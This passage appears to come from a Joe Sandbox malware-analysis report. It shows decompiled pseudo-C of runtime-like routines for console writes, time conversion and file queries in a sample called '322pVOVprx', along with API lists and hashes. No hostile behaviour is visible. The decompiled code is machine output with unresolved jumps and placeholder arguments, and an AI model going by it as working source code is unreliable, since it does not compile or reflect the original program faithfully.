                                                                                                                                                                                                                                                        				_t166 = _t133;
                                                                                                                                                                                                                                                        				if (_t166 == 0) goto 0xe5acc65c;
                                                                                                                                                                                                                                                        				if (_t166 == 0) goto 0xe5acc648;
                                                                                                                                                                                                                                                        				if (_t133 - 1 != 1) goto 0xe5acc6b4;
                                                                                                                                                                                                                                                        				r9d = r14d;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACBFEC(_t122, r15d, _t179, _t183,  &_v128, _t207, _t205, _t217, _t218);
                                                                                                                                                                                                                                                        				goto 0xe5acc600;
                                                                                                                                                                                                                                                        				r9d = r14d;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACC108(r15d,  *((intOrPtr*)(_t179 + 8)), _t179, _t183,  &_v128, _t207, _t205, _t217, _t218);
                                                                                                                                                                                                                                                        				goto 0xe5acc600;
                                                                                                                                                                                                                                                        				r9d = r14d;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACBEE8(_t122, _t133 - 1, r15d, _t179, _t183,  &_v128, _t207, _t205, _t217, _t218);
                                                                                                                                                                                                                                                        				goto 0xe5acc600;
                                                                                                                                                                                                                                                        				r8d = r14d;
                                                                                                                                                                                                                                                        				_v152 = _v152 & _t179;
                                                                                                                                                                                                                                                        				_v128 = _t179;
                                                                                                                                                                                                                                                        				_v120 = 0;
                                                                                                                                                                                                                                                        				_t115 = WriteFile(??, ??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                        				if (_t115 != 0) goto 0xe5acc6a0;
                                                                                                                                                                                                                                                        				_t116 = GetLastError();
                                                                                                                                                                                                                                                        				_v128 = _t116;
                                                                                                                                                                                                                                                        				asm("movsd xmm0, [ebp-0x40]");
                                                                                                                                                                                                                                                        				asm("movsd [ebp-0x30], xmm0");
                                                                                                                                                                                                                                                        				if (_t116 != 0) goto 0xe5acc71c;
                                                                                                                                                                                                                                                        				_t117 = _v112;
                                                                                                                                                                                                                                                        				if (_t117 == 0) goto 0xe5acc6f3;
                                                                                                                                                                                                                                                        				if (_t117 != 5) goto 0xe5acc6e3;
                                                                                                                                                                                                                                                        				 *((char*)(_t183 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t183 + 0x2c)) = 9;
                                                                                                                                                                                                                                                        				 *((char*)(_t183 + 0x38)) = 1;
                                                                                                                                                                                                                                                        				 *(_t183 + 0x34) = _t117;
                                                                                                                                                                                                                                                        				goto 0xe5acc48f;
                                                                                                                                                                                                                                                        				_t203 = _t183;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4400(_v112, _t203);
                                                                                                                                                                                                                                                        				goto 0xe5acc48f;
                                                                                                                                                                                                                                                        				if (( *( *((intOrPtr*)(_t203 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0xe5acc704;
                                                                                                                                                                                                                                                        				if ( *_t205 == 0x1a) goto 0xe5acc723;
                                                                                                                                                                                                                                                        				 *(_t183 + 0x34) =  *(_t183 + 0x34) & 0x00000000;
                                                                                                                                                                                                                                                        				 *((char*)(_t183 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t183 + 0x2c)) = 0x1c;
                                                                                                                                                                                                                                                        				 *((char*)(_t183 + 0x38)) = 1;
                                                                                                                                                                                                                                                        				goto 0xe5acc48f;
                                                                                                                                                                                                                                                        				goto 0xe5acc725;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}










































                                                                                                                                                                                                                                                        0x7ff6e5acc430
                                                                                                                                                                                                                                                        0x7ff6e5acc430
                                                                                                                                                                                                                                                        0x7ff6e5acc430
                                                                                                                                                                                                                                                        0x7ff6e5acc430
                                                                                                                                                                                                                                                        0x7ff6e5acc446
                                                                                                                                                                                                                                                        0x7ff6e5acc44c
                                                                                                                                                                                                                                                        0x7ff6e5acc44f
                                                                                                                                                                                                                                                        0x7ff6e5acc455
                                                                                                                                                                                                                                                        0x7ff6e5acc45e
                                                                                                                                                                                                                                                        0x7ff6e5acc460
                                                                                                                                                                                                                                                        0x7ff6e5acc465
                                                                                                                                                                                                                                                        0x7ff6e5acc468
                                                                                                                                                                                                                                                        0x7ff6e5acc46e
                                                                                                                                                                                                                                                        0x7ff6e5acc475
                                                                                                                                                                                                                                                        0x7ff6e5acc47d
                                                                                                                                                                                                                                                        0x7ff6e5acc480
                                                                                                                                                                                                                                                        0x7ff6e5acc485
                                                                                                                                                                                                                                                        0x7ff6e5acc48a
                                                                                                                                                                                                                                                        0x7ff6e5acc492
                                                                                                                                                                                                                                                        0x7ff6e5acc4a7
                                                                                                                                                                                                                                                        0x7ff6e5acc4ab
                                                                                                                                                                                                                                                        0x7ff6e5acc4af
                                                                                                                                                                                                                                                        0x7ff6e5acc4b7
                                                                                                                                                                                                                                                        0x7ff6e5acc4bc
                                                                                                                                                                                                                                                        0x7ff6e5acc4c3
                                                                                                                                                                                                                                                        0x7ff6e5acc4cc
                                                                                                                                                                                                                                                        0x7ff6e5acc4d4
                                                                                                                                                                                                                                                        0x7ff6e5acc4db
                                                                                                                                                                                                                                                        0x7ff6e5acc4db
                                                                                                                                                                                                                                                        0x7ff6e5acc4df
                                                                                                                                                                                                                                                        0x7ff6e5acc4e7
                                                                                                                                                                                                                                                        0x7ff6e5acc4f9
                                                                                                                                                                                                                                                        0x7ff6e5acc508
                                                                                                                                                                                                                                                        0x7ff6e5acc512
                                                                                                                                                                                                                                                        0x7ff6e5acc517
                                                                                                                                                                                                                                                        0x7ff6e5acc52e
                                                                                                                                                                                                                                                        0x7ff6e5acc530
                                                                                                                                                                                                                                                        0x7ff6e5acc539
                                                                                                                                                                                                                                                        0x7ff6e5acc554
                                                                                                                                                                                                                                                        0x7ff6e5acc55a
                                                                                                                                                                                                                                                        0x7ff6e5acc55e
                                                                                                                                                                                                                                                        0x7ff6e5acc560
                                                                                                                                                                                                                                                        0x7ff6e5acc569
                                                                                                                                                                                                                                                        0x7ff6e5acc56e
                                                                                                                                                                                                                                                        0x7ff6e5acc574
                                                                                                                                                                                                                                                        0x7ff6e5acc578
                                                                                                                                                                                                                                                        0x7ff6e5acc57c
                                                                                                                                                                                                                                                        0x7ff6e5acc582
                                                                                                                                                                                                                                                        0x7ff6e5acc584
                                                                                                                                                                                                                                                        0x7ff6e5acc58f
                                                                                                                                                                                                                                                        0x7ff6e5acc593
                                                                                                                                                                                                                                                        0x7ff6e5acc598
                                                                                                                                                                                                                                                        0x7ff6e5acc59f
                                                                                                                                                                                                                                                        0x7ff6e5acc5a1
                                                                                                                                                                                                                                                        0x7ff6e5acc5a5
                                                                                                                                                                                                                                                        0x7ff6e5acc5ad
                                                                                                                                                                                                                                                        0x7ff6e5acc5c1
                                                                                                                                                                                                                                                        0x7ff6e5acc5c3
                                                                                                                                                                                                                                                        0x7ff6e5acc5c6
                                                                                                                                                                                                                                                        0x7ff6e5acc5d3
                                                                                                                                                                                                                                                        0x7ff6e5acc5d5
                                                                                                                                                                                                                                                        0x7ff6e5acc5dd
                                                                                                                                                                                                                                                        0x7ff6e5acc5e0
                                                                                                                                                                                                                                                        0x7ff6e5acc5e4
                                                                                                                                                                                                                                                        0x7ff6e5acc5e9
                                                                                                                                                                                                                                                        0x7ff6e5acc5ec
                                                                                                                                                                                                                                                        0x7ff6e5acc5fb
                                                                                                                                                                                                                                                        0x7ff6e5acc600
                                                                                                                                                                                                                                                        0x7ff6e5acc607
                                                                                                                                                                                                                                                        0x7ff6e5acc61c
                                                                                                                                                                                                                                                        0x7ff6e5acc61e
                                                                                                                                                                                                                                                        0x7ff6e5acc622
                                                                                                                                                                                                                                                        0x7ff6e5acc624
                                                                                                                                                                                                                                                        0x7ff6e5acc629
                                                                                                                                                                                                                                                        0x7ff6e5acc62e
                                                                                                                                                                                                                                                        0x7ff6e5acc634
                                                                                                                                                                                                                                                        0x7ff6e5acc641
                                                                                                                                                                                                                                                        0x7ff6e5acc646
                                                                                                                                                                                                                                                        0x7ff6e5acc648
                                                                                                                                                                                                                                                        0x7ff6e5acc655
                                                                                                                                                                                                                                                        0x7ff6e5acc65a
                                                                                                                                                                                                                                                        0x7ff6e5acc65c
                                                                                                                                                                                                                                                        0x7ff6e5acc669
                                                                                                                                                                                                                                                        0x7ff6e5acc66e
                                                                                                                                                                                                                                                        0x7ff6e5acc67b
                                                                                                                                                                                                                                                        0x7ff6e5acc67e
                                                                                                                                                                                                                                                        0x7ff6e5acc686
                                                                                                                                                                                                                                                        0x7ff6e5acc68a
                                                                                                                                                                                                                                                        0x7ff6e5acc68d
                                                                                                                                                                                                                                                        0x7ff6e5acc695
                                                                                                                                                                                                                                                        0x7ff6e5acc697
                                                                                                                                                                                                                                                        0x7ff6e5acc69d
                                                                                                                                                                                                                                                        0x7ff6e5acc6a3
                                                                                                                                                                                                                                                        0x7ff6e5acc6a8
                                                                                                                                                                                                                                                        0x7ff6e5acc6be
                                                                                                                                                                                                                                                        0x7ff6e5acc6c0
                                                                                                                                                                                                                                                        0x7ff6e5acc6c5
                                                                                                                                                                                                                                                        0x7ff6e5acc6ca
                                                                                                                                                                                                                                                        0x7ff6e5acc6cc
                                                                                                                                                                                                                                                        0x7ff6e5acc6d0
                                                                                                                                                                                                                                                        0x7ff6e5acc6d7
                                                                                                                                                                                                                                                        0x7ff6e5acc6db
                                                                                                                                                                                                                                                        0x7ff6e5acc6de
                                                                                                                                                                                                                                                        0x7ff6e5acc6e6
                                                                                                                                                                                                                                                        0x7ff6e5acc6e9
                                                                                                                                                                                                                                                        0x7ff6e5acc6ee
                                                                                                                                                                                                                                                        0x7ff6e5acc6fd
                                                                                                                                                                                                                                                        0x7ff6e5acc702
                                                                                                                                                                                                                                                        0x7ff6e5acc704
                                                                                                                                                                                                                                                        0x7ff6e5acc708
                                                                                                                                                                                                                                                        0x7ff6e5acc70c
                                                                                                                                                                                                                                                        0x7ff6e5acc713
                                                                                                                                                                                                                                                        0x7ff6e5acc717
                                                                                                                                                                                                                                                        0x7ff6e5acc721
                                                                                                                                                                                                                                                        0x7ff6e5acc735

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6E5ACC41B), ref: 00007FF6E5ACC54C
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6E5ACC41B), ref: 00007FF6E5ACC5D7
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                                                        • Opcode ID: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                                                                                                                                                                                                                        • Instruction ID: 864b7a71e2a40a4a06e31926baaf90bdf8e03a27d1d6d959cc73792a444df154
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7491B123B1865185F7609F6994743BD2BA0AF04F88F585139DF1EDBA84DF3AD842C70A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        C-Code - Quality: 97%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACE8DC(signed int __edx, void* __edi, void* __rcx, void* __rdx, intOrPtr _a40, intOrPtr _a48, intOrPtr _a56) {
                                                                                                                                                                                                                                                        				signed int _v80;
                                                                                                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                                                                                                        				intOrPtr _v112;
                                                                                                                                                                                                                                                        				intOrPtr _v116;
                                                                                                                                                                                                                                                        				char _v120;
                                                                                                                                                                                                                                                        				intOrPtr _v124;
                                                                                                                                                                                                                                                        				char _v128;
                                                                                                                                                                                                                                                        				char _v132;
                                                                                                                                                                                                                                                        				char _v136;
                                                                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                                                                                                        				signed long long _t86;
                                                                                                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                                                                                                        				signed long long _t110;
                                                                                                                                                                                                                                                        				intOrPtr _t112;
                                                                                                                                                                                                                                                        				void* _t117;
                                                                                                                                                                                                                                                        				intOrPtr* _t118;
                                                                                                                                                                                                                                                        				void* _t120;
                                                                                                                                                                                                                                                        				signed long long _t140;
                                                                                                                                                                                                                                                        				void* _t143;
                                                                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                                                                        				intOrPtr* _t152;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t110 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_v80 = _t110 ^ _t146 - 0x00000078;
                                                                                                                                                                                                                                                        				_t67 = __rcx - 0x76c;
                                                                                                                                                                                                                                                        				_t86 = r8d;
                                                                                                                                                                                                                                                        				_t140 = __edx;
                                                                                                                                                                                                                                                        				if (_t67 - 0x46 < 0) goto 0xe5aceace;
                                                                                                                                                                                                                                                        				_t112 = _t67;
                                                                                                                                                                                                                                                        				if (_t112 - 0x44d > 0) goto 0xe5aceace;
                                                                                                                                                                                                                                                        				_t49 = __edx - 1;
                                                                                                                                                                                                                                                        				_v124 = _t49;
                                                                                                                                                                                                                                                        				if (_t49 - 0xb > 0) goto 0xe5aceace;
                                                                                                                                                                                                                                                        				if (r8d <= 0) goto 0xe5aceace;
                                                                                                                                                                                                                                                        				if (r8d -  *((intOrPtr*)(0xe5ae7800 + __edx * 4)) -  *((intOrPtr*)(0xe5ae7800 + __edx * 4 - 4)) <= 0) goto 0xe5ace980;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ACE880(_t67, r8d -  *((intOrPtr*)(0xe5ae7800 + __edx * 4)) -  *((intOrPtr*)(0xe5ae7800 + __edx * 4 - 4))) == 0) goto 0xe5aceace;
                                                                                                                                                                                                                                                        				if (__edi != 2) goto 0xe5aceace;
                                                                                                                                                                                                                                                        				if (_t86 - 0x1d > 0) goto 0xe5aceace;
                                                                                                                                                                                                                                                        				if (r13d - 0x17 > 0) goto 0xe5aceace;
                                                                                                                                                                                                                                                        				if (r12d - 0x3b > 0) goto 0xe5aceace;
                                                                                                                                                                                                                                                        				if (r15d - 0x3b > 0) goto 0xe5aceace;
                                                                                                                                                                                                                                                        				_t53 = E00007FF67FF6E5ACE880(_t67, r15d - 0x3b);
                                                                                                                                                                                                                                                        				r14d = 0;
                                                                                                                                                                                                                                                        				if (_t53 == 0) goto 0xe5ace9b7;
                                                                                                                                                                                                                                                        				if (__edi - 2 <= 0) goto 0xe5ace9b7;
                                                                                                                                                                                                                                                        				_t88 = _t86 +  *((intOrPtr*)(0xe5ae7800 + _t140 * 4 - 4)) + 1; // executed
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD53B4(_t112); // executed
                                                                                                                                                                                                                                                        				_v128 = r14d;
                                                                                                                                                                                                                                                        				_v132 = r14d;
                                                                                                                                                                                                                                                        				_v136 = r14d;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD47B8(_t112,  &_v128) != 0) goto 0xe5aceafa;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD47E8(_t112,  &_v132) != 0) goto 0xe5aceafa;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD4818(_t112,  &_v136) != 0) goto 0xe5aceafa;
                                                                                                                                                                                                                                                        				r10d = 0x51eb851f;
                                                                                                                                                                                                                                                        				r8d = _t120 - 1;
                                                                                                                                                                                                                                                        				r9d = r10d * (_t120 + 0x12b) >> 0x20;
                                                                                                                                                                                                                                                        				r9d = r9d >> 7;
                                                                                                                                                                                                                                                        				r9d = r9d + (r9d >> 0x1f);
                                                                                                                                                                                                                                                        				r9d = r9d - (r10d * r8d >> 0x20 >> 5) + (r10d * r8d >> 0x20 >> 5 >> 0x1f);
                                                                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                                                                        				_t143 = ((((__rdx + _t112 >> 2) + 0xffffffef + r9d + (_t67 + 0xffffffba) * 0x16d + _t88 + ((__rdx + _t112 >> 2) + 0xffffffef + r9d + (_t67 + 0xffffffba) * 0x16d + _t88) * 2) * 8 + r9d) * 0x3c + _a40) * 0x3c + _v136 + _a48;
                                                                                                                                                                                                                                                        				_t152 = _v132 + _t143;
                                                                                                                                                                                                                                                        				if (_a56 == 1) goto 0xe5aceac9;
                                                                                                                                                                                                                                                        				_v104 = _v124;
                                                                                                                                                                                                                                                        				_v92 = _t88;
                                                                                                                                                                                                                                                        				_v100 = _t67;
                                                                                                                                                                                                                                                        				_v112 = r13d;
                                                                                                                                                                                                                                                        				_v116 = r12d;
                                                                                                                                                                                                                                                        				_v120 = r15d;
                                                                                                                                                                                                                                                        				if (_a56 != 0xffffffff) goto 0xe5aceac4;
                                                                                                                                                                                                                                                        				if (_v128 == 0) goto 0xe5aceac4;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD53F8( &_v120);
                                                                                                                                                                                                                                                        				_t144 =  !=  ? _t152 : _t143;
                                                                                                                                                                                                                                                        				_t117 =  !=  ? _t152 : _t143;
                                                                                                                                                                                                                                                        				goto 0xe5aceadd;
                                                                                                                                                                                                                                                        				_t118 = _t152;
                                                                                                                                                                                                                                                        				goto 0xe5aceadd;
                                                                                                                                                                                                                                                        				_t65 = E00007FF67FF6E5AC4444(_t118);
                                                                                                                                                                                                                                                        				 *_t118 = 0x16;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(_t65, (__rdx + _t112 >> 2) + 0xffffffef + r9d, _v80 ^ _t146 - 0x00000078);
                                                                                                                                                                                                                                                        			}





























                                                                                                                                                                                                                                                        0x7ff6e5ace8f0
                                                                                                                                                                                                                                                        0x7ff6e5ace8fa
                                                                                                                                                                                                                                                        0x7ff6e5ace902
                                                                                                                                                                                                                                                        0x7ff6e5ace90c
                                                                                                                                                                                                                                                        0x7ff6e5ace912
                                                                                                                                                                                                                                                        0x7ff6e5ace918
                                                                                                                                                                                                                                                        0x7ff6e5ace91e
                                                                                                                                                                                                                                                        0x7ff6e5ace927
                                                                                                                                                                                                                                                        0x7ff6e5ace92d
                                                                                                                                                                                                                                                        0x7ff6e5ace930
                                                                                                                                                                                                                                                        0x7ff6e5ace936
                                                                                                                                                                                                                                                        0x7ff6e5ace93f
                                                                                                                                                                                                                                                        0x7ff6e5ace956
                                                                                                                                                                                                                                                        0x7ff6e5ace961
                                                                                                                                                                                                                                                        0x7ff6e5ace96a
                                                                                                                                                                                                                                                        0x7ff6e5ace973
                                                                                                                                                                                                                                                        0x7ff6e5ace984
                                                                                                                                                                                                                                                        0x7ff6e5ace98e
                                                                                                                                                                                                                                                        0x7ff6e5ace998
                                                                                                                                                                                                                                                        0x7ff6e5ace9a4
                                                                                                                                                                                                                                                        0x7ff6e5ace9a9
                                                                                                                                                                                                                                                        0x7ff6e5ace9ae
                                                                                                                                                                                                                                                        0x7ff6e5ace9b3
                                                                                                                                                                                                                                                        0x7ff6e5ace9b5
                                                                                                                                                                                                                                                        0x7ff6e5ace9b7
                                                                                                                                                                                                                                                        0x7ff6e5ace9c0
                                                                                                                                                                                                                                                        0x7ff6e5ace9c4
                                                                                                                                                                                                                                                        0x7ff6e5ace9c8
                                                                                                                                                                                                                                                        0x7ff6e5ace9d3
                                                                                                                                                                                                                                                        0x7ff6e5ace9e4
                                                                                                                                                                                                                                                        0x7ff6e5ace9f5
                                                                                                                                                                                                                                                        0x7ff6e5acea05
                                                                                                                                                                                                                                                        0x7ff6e5acea0b
                                                                                                                                                                                                                                                        0x7ff6e5acea17
                                                                                                                                                                                                                                                        0x7ff6e5acea1d
                                                                                                                                                                                                                                                        0x7ff6e5acea2d
                                                                                                                                                                                                                                                        0x7ff6e5acea37
                                                                                                                                                                                                                                                        0x7ff6e5acea3a
                                                                                                                                                                                                                                                        0x7ff6e5acea85
                                                                                                                                                                                                                                                        0x7ff6e5acea88
                                                                                                                                                                                                                                                        0x7ff6e5acea8f
                                                                                                                                                                                                                                                        0x7ff6e5acea98
                                                                                                                                                                                                                                                        0x7ff6e5acea9b
                                                                                                                                                                                                                                                        0x7ff6e5acea9e
                                                                                                                                                                                                                                                        0x7ff6e5aceaa1
                                                                                                                                                                                                                                                        0x7ff6e5aceaa5
                                                                                                                                                                                                                                                        0x7ff6e5aceaa9
                                                                                                                                                                                                                                                        0x7ff6e5aceaad
                                                                                                                                                                                                                                                        0x7ff6e5aceab3
                                                                                                                                                                                                                                                        0x7ff6e5aceab9
                                                                                                                                                                                                                                                        0x7ff6e5aceac0
                                                                                                                                                                                                                                                        0x7ff6e5aceac4
                                                                                                                                                                                                                                                        0x7ff6e5aceac7
                                                                                                                                                                                                                                                        0x7ff6e5aceac9
                                                                                                                                                                                                                                                        0x7ff6e5aceacc
                                                                                                                                                                                                                                                        0x7ff6e5aceace
                                                                                                                                                                                                                                                        0x7ff6e5acead3
                                                                                                                                                                                                                                                        0x7ff6e5aceaf9

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                                                        • Opcode ID: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                                                                                                                                                                                                                        • Instruction ID: 04cb822f201f57ea6439e37e27f46e4b0aa62ee64bfbae4094cc132a19cfe0bf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24510473F042114AFB24DB68E9613BC27A1BF00B59F144239ED1EDAAD5DF3AA8028705
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        C-Code - Quality: 49%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC47D4(intOrPtr __edx, long long __rbx, void* __rcx, void* __r8, intOrPtr* __r9, long long _a16) {
                                                                                                                                                                                                                                                        				signed int _v56;
                                                                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                                                                        				signed int _v76;
                                                                                                                                                                                                                                                        				intOrPtr _v80;
                                                                                                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                                                                                                        				intOrPtr _v108;
                                                                                                                                                                                                                                                        				intOrPtr _v112;
                                                                                                                                                                                                                                                        				signed int _v120;
                                                                                                                                                                                                                                                        				signed long long _v128;
                                                                                                                                                                                                                                                        				long long _v136;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                                                                                        				long _t37;
                                                                                                                                                                                                                                                        				intOrPtr _t40;
                                                                                                                                                                                                                                                        				int _t42;
                                                                                                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                                                                                                        				intOrPtr _t60;
                                                                                                                                                                                                                                                        				long _t61;
                                                                                                                                                                                                                                                        				signed long long _t78;
                                                                                                                                                                                                                                                        				signed long long _t79;
                                                                                                                                                                                                                                                        				intOrPtr _t89;
                                                                                                                                                                                                                                                        				void* _t102;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a16 = __rbx;
                                                                                                                                                                                                                                                        				_t78 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t79 = _t78 ^ _t102 - 0x00000080;
                                                                                                                                                                                                                                                        				_v56 = _t79;
                                                                                                                                                                                                                                                        				r14d = __edx; // executed
                                                                                                                                                                                                                                                        				_t37 = GetFileType(??); // executed
                                                                                                                                                                                                                                                        				r15d = 1;
                                                                                                                                                                                                                                                        				asm("btr ecx, 0xf");
                                                                                                                                                                                                                                                        				if (_t37 != r15d) goto 0xe5ac48df;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__r9 + 8)) = r15w;
                                                                                                                                                                                                                                                        				if (__rcx == 0) goto 0xe5ac484e;
                                                                                                                                                                                                                                                        				_v120 = _v120 & 0x00000000;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AC4BF4(__rcx,  &_v120, __r8) == 0) goto 0xe5ac48f6;
                                                                                                                                                                                                                                                        				_t40 = _v120 - 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__r9 + 0x10)) = _t40;
                                                                                                                                                                                                                                                        				 *__r9 = _t40;
                                                                                                                                                                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                                                                                                                                                                        				asm("movups [ebp-0x48], xmm0");
                                                                                                                                                                                                                                                        				_v64 = 0;
                                                                                                                                                                                                                                                        				asm("movups [ebp-0x38], xmm0");
                                                                                                                                                                                                                                                        				asm("movups [ebp-0x28], xmm0"); // executed
                                                                                                                                                                                                                                                        				_t42 = GetFileInformationByHandle(??, ??); // executed
                                                                                                                                                                                                                                                        				if (_t42 == 0) goto 0xe5ac48fa;
                                                                                                                                                                                                                                                        				_t60 = _v112;
                                                                                                                                                                                                                                                        				_t96 = __rcx;
                                                                                                                                                                                                                                                        				 *((short*)(__r9 + 6)) = E00007FF67FF6E5AC4AB8(_t60, __r9, __rcx, __r8, _t102);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC497C(_t60, _v92, _t96); // executed
                                                                                                                                                                                                                                                        				 *(__r9 + 0x20) = _t79;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC497C(_t60, _v100, _t79); // executed
                                                                                                                                                                                                                                                        				_t89 = _v108;
                                                                                                                                                                                                                                                        				 *(__r9 + 0x18) = _t79;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC497C(_t60, _t89,  *(__r9 + 0x20)); // executed
                                                                                                                                                                                                                                                        				 *(__r9 + 0x28) = _t79;
                                                                                                                                                                                                                                                        				 *(__r9 + 0x14) =  *(__r9 + 0x14) & 0x00000000;
                                                                                                                                                                                                                                                        				if (_v80 != 0) goto 0xe5ac48d2;
                                                                                                                                                                                                                                                        				_t47 = _v76;
                                                                                                                                                                                                                                                        				if (_t47 - 0x7fffffff > 0) goto 0xe5ac48d2;
                                                                                                                                                                                                                                                        				 *(__r9 + 0x14) = _t47;
                                                                                                                                                                                                                                                        				goto 0xe5ac4956;
